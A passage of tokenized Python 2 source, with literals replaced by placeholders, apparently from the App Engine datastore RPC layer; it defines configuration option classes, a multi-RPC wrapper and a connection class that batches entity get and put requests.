_cls = cls <EOL> return cls <EOL> class BaseConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = _ConfigurationMetaClass <EOL> _options = { } <EOL> def __new__ ( cls , config = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if config is None : <EOL> pass <EOL> elif isinstance ( config , BaseConfiguration ) : <EOL> if cls is config . __class__ and config . __is_stronger ( ** kwargs ) : <EOL> return config <EOL> for key , value in config . _values . iteritems ( ) : <EOL> if issubclass ( cls , config . _options [ key ] . _cls ) : <EOL> kwargs . setdefault ( key , value ) <EOL> else : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( config , ) ) <EOL> obj = super ( BaseConfiguration , cls ) . __new__ ( cls ) <EOL> obj . _values = { } <EOL> for key , value in kwargs . iteritems ( ) : <EOL> if value is not None : <EOL> try : <EOL> config_option = obj . _options [ key ] <EOL> except KeyError , err : <EOL> raise TypeError ( '<STR_LIT>' % err ) <EOL> value = config_option . validator ( value ) <EOL> if value is not None : <EOL> obj . _values [ key ] = value <EOL> return obj <EOL> def __eq__ ( self , other ) : <EOL> if self is other : <EOL> return True <EOL> if not isinstance ( other , BaseConfiguration ) : <EOL> return NotImplemented <EOL> return self . _options == other . _options and self . _values == other . _values <EOL> def __ne__ ( self , other ) : <EOL> equal = self . __eq__ ( other ) <EOL> if equal is NotImplemented : <EOL> return equal <EOL> return not equal <EOL> def __hash__ ( self ) : <EOL> return ( hash ( frozenset ( self . _values . iteritems ( ) ) ) ^ <EOL> hash ( frozenset ( self . _options . iteritems ( ) ) ) ) <EOL> def __repr__ ( self ) : <EOL> args = [ ] <EOL> for key_value in sorted ( self . _values . iteritems ( ) ) : <EOL> args . append ( '<STR_LIT>' % key_value ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . 
join ( args ) ) <EOL> def __is_stronger ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for key , value in kwargs . iteritems ( ) : <EOL> if key not in self . _values or value != self . _values [ key ] : <EOL> return False <EOL> return True <EOL> @ classmethod <EOL> def is_configuration ( cls , obj ) : <EOL> """<STR_LIT>""" <EOL> return isinstance ( obj , BaseConfiguration ) and obj . _is_configuration ( cls ) <EOL> def _is_configuration ( self , cls ) : <EOL> return isinstance ( self , cls ) <EOL> def merge ( self , config ) : <EOL> """<STR_LIT>""" <EOL> if config is None or config is self : <EOL> return self <EOL> if not ( isinstance ( config , _MergedConfiguration ) or <EOL> isinstance ( self , _MergedConfiguration ) ) : <EOL> if isinstance ( config , self . __class__ ) : <EOL> for key in self . _values : <EOL> if key not in config . _values : <EOL> break <EOL> else : <EOL> return config <EOL> if isinstance ( self , config . __class__ ) : <EOL> if self . __is_stronger ( ** config . _values ) : <EOL> return self <EOL> def _quick_merge ( obj ) : <EOL> obj . _values = self . _values . copy ( ) <EOL> obj . _values . update ( config . _values ) <EOL> return obj <EOL> if isinstance ( config , self . __class__ ) : <EOL> return _quick_merge ( type ( config ) ( ) ) <EOL> if isinstance ( self , config . __class__ ) : <EOL> return _quick_merge ( type ( self ) ( ) ) <EOL> return _MergedConfiguration ( config , self ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . _values } <EOL> def __setstate__ ( self , state ) : <EOL> obj = self . __class__ ( ** state [ '<STR_LIT>' ] ) <EOL> self . _values = obj . _values <EOL> class _MergedConfiguration ( BaseConfiguration ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __new__ ( cls , * configs ) : <EOL> obj = super ( BaseConfiguration , cls ) . __new__ ( cls ) <EOL> obj . _configs = configs <EOL> obj . 
_options = { } <EOL> for config in configs : <EOL> for name , option in config . _options . iteritems ( ) : <EOL> if name in obj . _options : <EOL> if option is not obj . _options [ name ] : <EOL> error = ( "<STR_LIT>" % <EOL> ( name , option . _cls . __name__ , <EOL> obj . _options [ name ] . _cls . __name__ ) ) <EOL> raise datastore_errors . BadArgumentError ( error ) <EOL> obj . _options [ name ] = option <EOL> obj . _values = { } <EOL> for config in reversed ( configs ) : <EOL> for name , value in config . _values . iteritems ( ) : <EOL> obj . _values [ name ] = value <EOL> return obj <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , tuple ( self . _configs ) ) <EOL> def _is_configuration ( self , cls ) : <EOL> for config in self . _configs : <EOL> if config . _is_configuration ( cls ) : <EOL> return True <EOL> return False <EOL> def __getattr__ ( self , name ) : <EOL> if name in self . _options : <EOL> if name in self . _values : <EOL> return self . _values [ name ] <EOL> else : <EOL> return None <EOL> raise AttributeError ( "<STR_LIT>" % ( name , ) ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . _configs } <EOL> def __setstate__ ( self , state ) : <EOL> obj = _MergedConfiguration ( * state [ '<STR_LIT>' ] ) <EOL> self . _values = obj . _values <EOL> self . _configs = obj . _configs <EOL> self . _options = obj . _options <EOL> class Configuration ( BaseConfiguration ) : <EOL> """<STR_LIT>""" <EOL> STRONG_CONSISTENCY = <NUM_LIT:0> <EOL> """<STR_LIT>""" <EOL> EVENTUAL_CONSISTENCY = <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> APPLY_ALL_JOBS_CONSISTENCY = <NUM_LIT:2> <EOL> """<STR_LIT>""" <EOL> ALL_READ_POLICIES = frozenset ( ( STRONG_CONSISTENCY , <EOL> EVENTUAL_CONSISTENCY , <EOL> APPLY_ALL_JOBS_CONSISTENCY , <EOL> ) ) <EOL> @ ConfigOption <EOL> def deadline ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , ( int , long , float ) ) : <EOL> raise datastore_errors . 
BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> if value <= <NUM_LIT:0> : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def on_completion ( value ) : <EOL> """<STR_LIT>""" <EOL> return value <EOL> @ ConfigOption <EOL> def read_policy ( value ) : <EOL> """<STR_LIT>""" <EOL> if value not in Configuration . ALL_READ_POLICIES : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def force_writes ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , bool ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_entity_groups_per_rpc ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_allocate_ids_keys ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_rpc_bytes ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_get_keys ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_put_entities ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . 
BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_delete_keys ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> _NOOP_SERVICE = '<STR_LIT>' <EOL> class _NoopRPC ( apiproxy_rpc . RPC ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( _NoopRPC , self ) . __init__ ( ) <EOL> def _WaitImpl ( self ) : <EOL> return True <EOL> def _MakeCallImpl ( self ) : <EOL> self . _state = apiproxy_rpc . RPC . FINISHING <EOL> class _NoopRPCStub ( object ) : <EOL> """<STR_LIT>""" <EOL> def CreateRPC ( self ) : <EOL> return _NoopRPC ( ) <EOL> class MultiRpc ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , rpcs , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> self . __rpcs = self . flatten ( rpcs ) <EOL> self . __extra_hook = extra_hook <EOL> @ property <EOL> def rpcs ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . __rpcs ) <EOL> @ property <EOL> def state ( self ) : <EOL> """<STR_LIT>""" <EOL> lo = apiproxy_rpc . RPC . FINISHING <EOL> hi = apiproxy_rpc . RPC . IDLE <EOL> for rpc in self . __rpcs : <EOL> lo = min ( lo , rpc . state ) <EOL> hi = max ( hi , rpc . state ) <EOL> if lo == hi : <EOL> return lo <EOL> return apiproxy_rpc . RPC . RUNNING <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> apiproxy_stub_map . UserRPC . wait_all ( self . __rpcs ) <EOL> def check_success ( self ) : <EOL> """<STR_LIT>""" <EOL> self . wait ( ) <EOL> for rpc in self . __rpcs : <EOL> rpc . check_success ( ) <EOL> def get_result ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . __rpcs ) == <NUM_LIT:1> : <EOL> results = self . __rpcs [ <NUM_LIT:0> ] . get_result ( ) <EOL> else : <EOL> results = [ ] <EOL> for rpc in self . __rpcs : <EOL> result = rpc . get_result ( ) <EOL> if isinstance ( result , list ) : <EOL> results . 
extend ( result ) <EOL> elif result is not None : <EOL> results . append ( result ) <EOL> if self . __extra_hook is not None : <EOL> results = self . __extra_hook ( results ) <EOL> return results <EOL> @ classmethod <EOL> def flatten ( cls , rpcs ) : <EOL> """<STR_LIT>""" <EOL> flat = [ ] <EOL> for rpc in rpcs : <EOL> if isinstance ( rpc , MultiRpc ) : <EOL> flat . extend ( rpc . __rpcs ) <EOL> else : <EOL> if not isinstance ( rpc , apiproxy_stub_map . UserRPC ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( rpc , ) ) <EOL> flat . append ( rpc ) <EOL> return flat <EOL> @ classmethod <EOL> def wait_any ( cls , rpcs ) : <EOL> """<STR_LIT>""" <EOL> return apiproxy_stub_map . UserRPC . wait_any ( cls . flatten ( rpcs ) ) <EOL> @ classmethod <EOL> def wait_all ( cls , rpcs ) : <EOL> """<STR_LIT>""" <EOL> apiproxy_stub_map . UserRPC . wait_all ( cls . flatten ( rpcs ) ) <EOL> class BaseConnection ( object ) : <EOL> """<STR_LIT>""" <EOL> UNKNOWN_DATASTORE = <NUM_LIT:0> <EOL> MASTER_SLAVE_DATASTORE = <NUM_LIT:1> <EOL> HIGH_REPLICATION_DATASTORE = <NUM_LIT:2> <EOL> __SUPPORTED_VERSIONS = frozenset ( ( _DATASTORE_V3 , <EOL> _CLOUD_DATASTORE_V1 ) ) <EOL> @ _positional ( <NUM_LIT:1> ) <EOL> def __init__ ( self , adapter = None , config = None , _api_version = _DATASTORE_V3 ) : <EOL> """<STR_LIT>""" <EOL> if adapter is None : <EOL> adapter = IdentityAdapter ( ) <EOL> if not isinstance ( adapter , AbstractAdapter ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( adapter , ) ) <EOL> self . __adapter = adapter <EOL> if config is None : <EOL> config = Configuration ( ) <EOL> elif not Configuration . is_configuration ( config ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( config , ) ) <EOL> self . __config = config <EOL> if _api_version not in self . __SUPPORTED_VERSIONS : <EOL> raise datastore_errors . 
BadArgumentError ( <EOL> '<STR_LIT>' % ( _api_version , ) ) <EOL> if _api_version == _CLOUD_DATASTORE_V1 : <EOL> if not _CLOUD_DATASTORE_ENABLED : <EOL> raise datastore_errors . BadArgumentError ( <EOL> datastore_pbs . MISSING_CLOUD_DATASTORE_MESSAGE ) <EOL> apiproxy_stub_map . apiproxy . ReplaceStub ( _NOOP_SERVICE , _NoopRPCStub ( ) ) <EOL> self . _api_version = _api_version <EOL> self . __pending_rpcs = set ( ) <EOL> @ property <EOL> def adapter ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __adapter <EOL> @ property <EOL> def config ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __config <EOL> def _add_pending ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> assert not isinstance ( rpc , MultiRpc ) <EOL> self . __pending_rpcs . add ( rpc ) <EOL> def _remove_pending ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rpc , MultiRpc ) : <EOL> for wrapped_rpc in rpc . _MultiRpc__rpcs : <EOL> self . _remove_pending ( wrapped_rpc ) <EOL> else : <EOL> try : <EOL> self . __pending_rpcs . remove ( rpc ) <EOL> except KeyError : <EOL> pass <EOL> def is_pending ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rpc , MultiRpc ) : <EOL> for wrapped_rpc in rpc . _MultiRpc__rpcs : <EOL> if self . is_pending ( wrapped_rpc ) : <EOL> return True <EOL> return False <EOL> else : <EOL> return rpc in self . __pending_rpcs <EOL> def get_pending_rpcs ( self ) : <EOL> """<STR_LIT>""" <EOL> return set ( self . __pending_rpcs ) <EOL> def get_datastore_type ( self , app = None ) : <EOL> """<STR_LIT>""" <EOL> return _GetDatastoreType ( app ) <EOL> def wait_for_all_pending_rpcs ( self ) : <EOL> """<STR_LIT>""" <EOL> while self . __pending_rpcs : <EOL> try : <EOL> rpc = apiproxy_stub_map . UserRPC . wait_any ( self . __pending_rpcs ) <EOL> except Exception : <EOL> logging . info ( '<STR_LIT>' , <EOL> exc_info = True ) <EOL> continue <EOL> if rpc is None : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> continue <EOL> assert rpc . state == apiproxy_rpc . RPC . 
FINISHING <EOL> if rpc in self . __pending_rpcs : <EOL> try : <EOL> self . check_rpc_success ( rpc ) <EOL> except Exception : <EOL> logging . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> exc_info = True ) <EOL> def _create_rpc ( self , config = None , service_name = None ) : <EOL> """<STR_LIT>""" <EOL> deadline = Configuration . deadline ( config , self . __config ) <EOL> on_completion = Configuration . on_completion ( config , self . __config ) <EOL> callback = None <EOL> if service_name is None : <EOL> service_name = self . _api_version <EOL> if on_completion is not None : <EOL> def callback ( ) : <EOL> return on_completion ( rpc ) <EOL> rpc = apiproxy_stub_map . UserRPC ( service_name , deadline , callback ) <EOL> return rpc <EOL> create_rpc = _create_rpc <EOL> def _set_request_read_policy ( self , request , config = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) : <EOL> read_policy = getattr ( config , '<STR_LIT>' , None ) <EOL> else : <EOL> read_policy = Configuration . read_policy ( config ) <EOL> if read_policy is None : <EOL> read_policy = self . __config . read_policy <EOL> if hasattr ( request , '<STR_LIT>' ) and hasattr ( request , '<STR_LIT>' ) : <EOL> if read_policy == Configuration . APPLY_ALL_JOBS_CONSISTENCY : <EOL> request . set_strong ( True ) <EOL> return True <EOL> elif read_policy == Configuration . EVENTUAL_CONSISTENCY : <EOL> request . set_strong ( False ) <EOL> request . set_failover_ms ( - <NUM_LIT:1> ) <EOL> return False <EOL> else : <EOL> return None <EOL> elif hasattr ( request , '<STR_LIT>' ) : <EOL> if read_policy == Configuration . EVENTUAL_CONSISTENCY : <EOL> request . read_options . read_consistency = ( <EOL> googledatastore . ReadOptions . EVENTUAL ) <EOL> return False <EOL> else : <EOL> return None <EOL> else : <EOL> raise datastore_errors . 
BadRequestError ( <EOL> '<STR_LIT>' ) <EOL> def _set_request_transaction ( self , request ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def _make_rpc_call ( self , config , method , request , response , <EOL> get_result_hook = None , user_data = None , <EOL> service_name = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) : <EOL> rpc = config <EOL> else : <EOL> rpc = self . _create_rpc ( config , service_name ) <EOL> rpc . make_call ( method , request , response , get_result_hook , user_data ) <EOL> self . _add_pending ( rpc ) <EOL> return rpc <EOL> make_rpc_call = _make_rpc_call <EOL> def check_rpc_success ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> rpc . wait ( ) <EOL> finally : <EOL> self . _remove_pending ( rpc ) <EOL> try : <EOL> rpc . check_success ( ) <EOL> except apiproxy_errors . ApplicationError , err : <EOL> raise _ToDatastoreError ( err ) <EOL> MAX_RPC_BYTES = <NUM_LIT> * <NUM_LIT> <EOL> MAX_GET_KEYS = <NUM_LIT:1000> <EOL> MAX_PUT_ENTITIES = <NUM_LIT> <EOL> MAX_DELETE_KEYS = <NUM_LIT> <EOL> MAX_ALLOCATE_IDS_KEYS = <NUM_LIT> <EOL> DEFAULT_MAX_ENTITY_GROUPS_PER_RPC = <NUM_LIT:10> <EOL> def __get_max_entity_groups_per_rpc ( self , config ) : <EOL> """<STR_LIT>""" <EOL> return Configuration . max_entity_groups_per_rpc ( <EOL> config , self . __config ) or self . DEFAULT_MAX_ENTITY_GROUPS_PER_RPC <EOL> def _extract_entity_group ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if _CLOUD_DATASTORE_ENABLED and isinstance ( value , googledatastore . Entity ) : <EOL> value = value . key <EOL> if isinstance ( value , entity_pb . EntityProto ) : <EOL> value = value . key ( ) <EOL> if _CLOUD_DATASTORE_ENABLED and isinstance ( value , googledatastore . Key ) : <EOL> elem = value . path [ <NUM_LIT:0> ] <EOL> elem_id = elem . id <EOL> elem_name = elem . name <EOL> kind = elem . kind <EOL> else : <EOL> elem = value . path ( ) . element ( <NUM_LIT:0> ) <EOL> kind = elem . type ( ) <EOL> elem_id = elem . 
id ( ) <EOL> elem_name = elem . name ( ) <EOL> return ( kind , elem_id or elem_name or ( '<STR_LIT>' , id ( elem ) ) ) <EOL> def _map_and_group ( self , values , map_fn , group_fn ) : <EOL> """<STR_LIT>""" <EOL> indexed_key_groups = collections . defaultdict ( list ) <EOL> for index , value in enumerate ( values ) : <EOL> key = map_fn ( value ) <EOL> indexed_key_groups [ group_fn ( key ) ] . append ( ( key , index ) ) <EOL> return indexed_key_groups . values ( ) <EOL> def __create_result_index_pairs ( self , indexes ) : <EOL> """<STR_LIT>""" <EOL> def create_result_index_pairs ( results ) : <EOL> return zip ( results , indexes ) <EOL> return create_result_index_pairs <EOL> def __sort_result_index_pairs ( self , extra_hook ) : <EOL> """<STR_LIT>""" <EOL> def sort_result_index_pairs ( result_index_pairs ) : <EOL> results = [ None ] * len ( result_index_pairs ) <EOL> for result , index in result_index_pairs : <EOL> results [ index ] = result <EOL> if extra_hook is not None : <EOL> results = extra_hook ( results ) <EOL> return results <EOL> return sort_result_index_pairs <EOL> def _generate_pb_lists ( self , grouped_values , base_size , max_count , <EOL> max_groups , config ) : <EOL> """<STR_LIT>""" <EOL> max_size = ( Configuration . max_rpc_bytes ( config , self . __config ) or <EOL> self . MAX_RPC_BYTES ) <EOL> pbs = [ ] <EOL> pb_indexes = [ ] <EOL> size = base_size <EOL> num_groups = <NUM_LIT:0> <EOL> for indexed_pbs in grouped_values : <EOL> num_groups += <NUM_LIT:1> <EOL> if max_groups is not None and num_groups > max_groups : <EOL> yield ( pbs , pb_indexes ) <EOL> pbs = [ ] <EOL> pb_indexes = [ ] <EOL> size = base_size <EOL> num_groups = <NUM_LIT:1> <EOL> for indexed_pb in indexed_pbs : <EOL> ( pb , index ) = indexed_pb <EOL> incr_size = pb . ByteSize ( ) + <NUM_LIT:5> <EOL> if ( not isinstance ( config , apiproxy_stub_map . 
UserRPC ) and <EOL> ( len ( pbs ) >= max_count or ( pbs and size + incr_size > max_size ) ) ) : <EOL> yield ( pbs , pb_indexes ) <EOL> pbs = [ ] <EOL> pb_indexes = [ ] <EOL> size = base_size <EOL> num_groups = <NUM_LIT:1> <EOL> pbs . append ( pb ) <EOL> pb_indexes . append ( index ) <EOL> size += incr_size <EOL> yield ( pbs , pb_indexes ) <EOL> def __force ( self , req ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( req , ( datastore_pb . PutRequest , <EOL> datastore_pb . TouchRequest , <EOL> datastore_pb . DeleteRequest ) ) : <EOL> req . set_force ( True ) <EOL> def get ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> return self . async_get ( None , keys ) . get_result ( ) <EOL> def async_get ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def make_get_call ( base_req , pbs , extra_hook = None ) : <EOL> req = copy . deepcopy ( base_req ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> method = '<STR_LIT>' <EOL> req . keys . extend ( pbs ) <EOL> resp = googledatastore . LookupResponse ( ) <EOL> else : <EOL> method = '<STR_LIT>' <EOL> req . key_list ( ) . extend ( pbs ) <EOL> resp = datastore_pb . GetResponse ( ) <EOL> user_data = config , pbs , extra_hook <EOL> return self . _make_rpc_call ( config , method , req , resp , <EOL> get_result_hook = self . __get_hook , <EOL> user_data = user_data , <EOL> service_name = self . _api_version ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> base_req = googledatastore . LookupRequest ( ) <EOL> key_to_pb = self . __adapter . key_to_pb_v1 <EOL> else : <EOL> base_req = datastore_pb . GetRequest ( ) <EOL> base_req . set_allow_deferred ( True ) <EOL> key_to_pb = self . __adapter . key_to_pb <EOL> is_read_current = self . _set_request_read_policy ( base_req , config ) <EOL> txn = self . _set_request_transaction ( base_req ) <EOL> if isinstance ( config , apiproxy_stub_map . 
UserRPC ) or len ( keys ) <= <NUM_LIT:1> : <EOL> pbs = [ key_to_pb ( key ) for key in keys ] <EOL> return make_get_call ( base_req , pbs , extra_hook ) <EOL> max_count = ( Configuration . max_get_keys ( config , self . __config ) or <EOL> self . MAX_GET_KEYS ) <EOL> indexed_keys_by_entity_group = self . _map_and_group ( <EOL> keys , key_to_pb , self . _extract_entity_group ) <EOL> if is_read_current is None : <EOL> is_read_current = ( self . get_datastore_type ( ) == <EOL> BaseConnection . HIGH_REPLICATION_DATASTORE ) <EOL> if is_read_current and txn is None : <EOL> max_egs_per_rpc = self . __get_max_entity_groups_per_rpc ( config ) <EOL> else : <EOL> max_egs_per_rpc = None <EOL> pbsgen = self . _generate_pb_lists ( indexed_keys_by_entity_group , <EOL> base_req . ByteSize ( ) , max_count , <EOL> max_egs_per_rpc , config ) <EOL> rpcs = [ ] <EOL> for pbs , indexes in pbsgen : <EOL> rpcs . append ( make_get_call ( base_req , pbs , <EOL> self . __create_result_index_pairs ( indexes ) ) ) <EOL> return MultiRpc ( rpcs , self . __sort_result_index_pairs ( extra_hook ) ) <EOL> def __get_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> config , keys_from_request , extra_hook = rpc . user_data <EOL> if self . _api_version == _DATASTORE_V3 and rpc . response . in_order ( ) : <EOL> entities = [ ] <EOL> for entity_result in rpc . response . entity_list ( ) : <EOL> if entity_result . has_entity ( ) : <EOL> entity = self . __adapter . pb_to_entity ( entity_result . entity ( ) ) <EOL> else : <EOL> entity = None <EOL> entities . append ( entity ) <EOL> else : <EOL> current_get_response = rpc . response <EOL> result_dict = { } <EOL> self . __add_get_response_entities_to_dict ( current_get_response , <EOL> result_dict ) <EOL> deferred_req = copy . deepcopy ( rpc . request ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> method = '<STR_LIT>' <EOL> deferred_resp = googledatastore . 
LookupResponse ( ) <EOL> while current_get_response . deferred : <EOL> deferred_req . ClearField ( '<STR_LIT>' ) <EOL> deferred_req . keys . extend ( current_get_response . deferred ) <EOL> deferred_resp . Clear ( ) <EOL> deferred_rpc = self . _make_rpc_call ( config , method , <EOL> deferred_req , deferred_resp , <EOL> service_name = self . _api_version ) <EOL> deferred_rpc . get_result ( ) <EOL> current_get_response = deferred_rpc . response <EOL> self . __add_get_response_entities_to_dict ( current_get_response , <EOL> result_dict ) <EOL> else : <EOL> method = '<STR_LIT>' <EOL> deferred_resp = datastore_pb . GetResponse ( ) <EOL> while current_get_response . deferred_list ( ) : <EOL> deferred_req . clear_key ( ) <EOL> deferred_req . key_list ( ) . extend ( current_get_response . deferred_list ( ) ) <EOL> deferred_resp . Clear ( ) <EOL> deferred_rpc = self . _make_rpc_call ( config , method , <EOL> deferred_req , deferred_resp , <EOL> service_name = self . _api_version ) <EOL> deferred_rpc . get_result ( ) <EOL> current_get_response = deferred_rpc . response <EOL> self . __add_get_response_entities_to_dict ( current_get_response , <EOL> result_dict ) <EOL> entities = [ result_dict . get ( datastore_types . ReferenceToKeyValue ( pb ) ) <EOL> for pb in keys_from_request ] <EOL> if extra_hook is not None : <EOL> entities = extra_hook ( entities ) <EOL> return entities <EOL> def __add_get_response_entities_to_dict ( self , get_response , result_dict ) : <EOL> """<STR_LIT>""" <EOL> if ( _CLOUD_DATASTORE_ENABLED <EOL> and isinstance ( get_response , googledatastore . LookupResponse ) ) : <EOL> for result in get_response . found : <EOL> v1_key = result . entity . key <EOL> entity = self . __adapter . pb_v1_to_entity ( result . entity , False ) <EOL> result_dict [ datastore_types . ReferenceToKeyValue ( v1_key ) ] = entity <EOL> else : <EOL> for entity_result in get_response . entity_list ( ) : <EOL> if entity_result . 
has_entity ( ) : <EOL> reference_pb = entity_result . entity ( ) . key ( ) <EOL> hashable_key = datastore_types . ReferenceToKeyValue ( reference_pb ) <EOL> entity = self . __adapter . pb_to_entity ( entity_result . entity ( ) ) <EOL> result_dict [ hashable_key ] = entity <EOL> def get_indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . async_get_indexes ( None ) . get_result ( ) <EOL> def async_get_indexes ( self , config , extra_hook = None , _app = None ) : <EOL> """<STR_LIT>""" <EOL> req = datastore_pb . GetIndicesRequest ( ) <EOL> req . set_app_id ( datastore_types . ResolveAppId ( _app ) ) <EOL> resp = datastore_pb . CompositeIndices ( ) <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __get_indexes_hook , <EOL> user_data = extra_hook , <EOL> service_name = _DATASTORE_V3 ) <EOL> def __get_indexes_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> indexes = [ self . __adapter . pb_to_index ( index ) <EOL> for index in rpc . response . index_list ( ) ] <EOL> if rpc . user_data : <EOL> indexes = rpc . user_data ( indexes ) <EOL> return indexes <EOL> def put ( self , entities ) : <EOL> """<STR_LIT>""" <EOL> return self . async_put ( None , entities ) . get_result ( ) <EOL> def async_put ( self , config , entities , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def make_put_call ( base_req , pbs , user_data = None ) : <EOL> req = copy . deepcopy ( base_req ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> for entity in pbs : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . upsert . CopyFrom ( entity ) <EOL> method = '<STR_LIT>' <EOL> resp = googledatastore . CommitResponse ( ) <EOL> else : <EOL> req . entity_list ( ) . extend ( pbs ) <EOL> method = '<STR_LIT>' <EOL> resp = datastore_pb . PutResponse ( ) <EOL> user_data = pbs , user_data <EOL> return self . _make_rpc_call ( config , method , req , resp , <EOL> get_result_hook = self . 
__put_hook , <EOL> user_data = user_data , <EOL> service_name = self . _api_version ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> base_req = googledatastore . CommitRequest ( ) <EOL> base_req . mode = googledatastore . CommitRequest . NON_TRANSACTIONAL <EOL> entity_to_pb = self . __adapter . entity_to_pb_v1 <EOL> else : <EOL> base_req = datastore_pb . PutRequest ( ) <EOL> entity_to_pb = self . __adapter . entity_to_pb <EOL> self . _set_request_transaction ( base_req ) <EOL> if Configuration . force_writes ( config , self . __config ) : <EOL> self . __force ( base_req ) <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) or len ( entities ) <= <NUM_LIT:1> : <EOL> pbs = [ entity_to_pb ( entity ) for entity in entities ] <EOL> return make_put_call ( base_req , pbs , extra_hook ) <EOL> max_count = ( Configuration . max_put_entities ( config , self . __config ) or <EOL> self . MAX_PUT_ENTITIES ) <EOL> if ( ( self . _api_version == _CLOUD_DATASTORE_V1 and <EOL> not base_req . transaction ) or <EOL> not base_req . has_transaction ( ) ) : <EOL> max_egs_per_rpc = self . __get_max_entity_groups_per_rpc ( config ) <EOL> else : <EOL> max_egs_per_rpc = None <EOL> indexed_entities_by_entity_group = self . _map_and_group ( <EOL> entities , entity_to_pb , self . _extract_entity_group ) <EOL> pbsgen = self . _generate_pb_lists ( indexed_entities_by_entity_group , <EOL> base_req . ByteSize ( ) , max_count , <EOL> max_egs_per_rpc , config ) <EOL> rpcs = [ ] <EOL> for pbs , indexes in pbsgen : <EOL> rpcs . append ( make_put_call ( base_req , pbs , <EOL> self . __create_result_index_pairs ( indexes ) ) ) <EOL> return MultiRpc ( rpcs , self . __sort_result_index_pairs ( extra_hook ) ) 